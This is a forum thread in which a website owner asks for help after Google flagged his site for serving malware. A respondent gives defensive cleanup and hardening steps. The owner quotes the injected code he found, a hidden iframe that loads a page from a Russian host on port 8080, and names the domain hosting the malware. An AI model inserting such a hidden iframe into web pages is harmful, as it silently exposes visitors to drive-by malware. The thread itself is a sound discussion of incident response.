Site listed as suspicious by google
by questivity
about 1 year ago

Hello Folks,
Need a little help here. Google is identifying the two following issues on my website http://www.questivity.com/

What happened when Google visited this site?

Of the 2 pages we tested on the site over the past 90 days, 1 page(s) resulted in

malicious software being downloaded and installed without user consent. The last time

Google visited this site was on 2009-07-07, and the last time suspicious content was found on this site was on 2009-06-22.

Malicious software is hosted on 1 domain(s), including mediahomenameshopmovie.cn/. This site was hosted on 1 network(s) including AS32392 (OPENTRANSFER).

The dash board identifies the http://questivity.com/ as the page distributing malware.

I looked at the code and found the following:

</head><body><iframe src=“http://c7h.ru:8080/index.php” width=185 height=146 style=“visibility: hidden”>
<center>

I am suspecting that this might be related to issue 1. If any of the experts out there can plz. confirm.

I am not sure what to do about the second issue " This site was hosted on 1 network(s) including AS32392 (OPENTRANSFER)". Any ideas or suggestions will be greatly apprecaited.

by Kaleh
about 1 year ago

You have identified a script that needs to be removed. It may be on other pages as well. Don’t worry about the second issue related to the network.

*Let your hosting provider know that your sites have been hacked and see if they can help determine how the sites were hacked and fix that problem. (This one may be isolated to stolen FTP credentials.)

*Clean your local computer of any virus/trojan capable of capturing FTP credentials and change all of your passwords (many of the recent web-site hacks are the result of this issue)

*Upgrade any blog, forum, gallery, CMS or other script to reduce vulnerabilities created by outdated code

*Confirm that the web-host has updated anything they are responsible for

*Restore the last known good backup of your sites

*If you don’t have a backup, examine all files (including extra “suspicious” files, hidden files and error documents), and remove code you didn’t place there.

*Ask your host if you can switch from FTP to either SFTP or FTPS to minimize the chance of log-in credentials being “sniffed”

*After cleaning and securing your site, “Request a Review” through your Google Webmaster Tools Account . Sites must be added and ownership verified first.
About Contact Us Terms & Conditions Privacy Policy Copyright